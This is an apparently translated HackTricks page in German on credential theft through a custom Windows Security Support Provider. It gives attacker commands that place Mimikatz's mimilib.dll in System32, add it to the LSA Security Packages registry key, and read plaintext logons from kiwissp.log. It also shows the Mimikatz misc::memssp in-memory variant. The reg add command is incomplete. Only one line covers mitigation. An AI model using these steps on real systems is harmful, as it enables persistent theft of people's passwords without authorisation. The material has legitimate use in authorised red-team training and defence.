Custom SSP

Reading time: 3 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Custom SSP

Erfahren Sie hier, was ein SSP (Security Support Provider) ist.
Sie können Ihr eigenes SSP erstellen, um Kredentiale im Klartext zu erfassen, die zum Zugriff auf die Maschine verwendet werden.

Mimilib

Sie können die von Mimikatz bereitgestellte mimilib.dll-Binärdatei verwenden. Dies wird alle Kredentiale im Klartext in einer Datei protokollieren.
Legen Sie die dll in C:\Windows\System32\ ab.
Holen Sie sich eine Liste der vorhandenen LSA-Sicherheits-Pakete:

attacker@target
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Fügen Sie mimilib.dll zur Liste der Sicherheitsunterstützungsanbieter (Sicherheits-Pakete) hinzu:

bash
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Und nach einem Neustart können alle Anmeldeinformationen im Klartext in C:\Windows\System32\kiwissp.log gefunden werden.

Im Speicher

Sie können dies auch direkt im Speicher mit Mimikatz injizieren (beachten Sie, dass es ein wenig instabil/nicht funktionieren könnte):

bash
privilege::debug
misc::memssp

Das übersteht keine Neustarts.

Minderung

Ereignis-ID 4657 - Überwachung der Erstellung/Änderung von HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks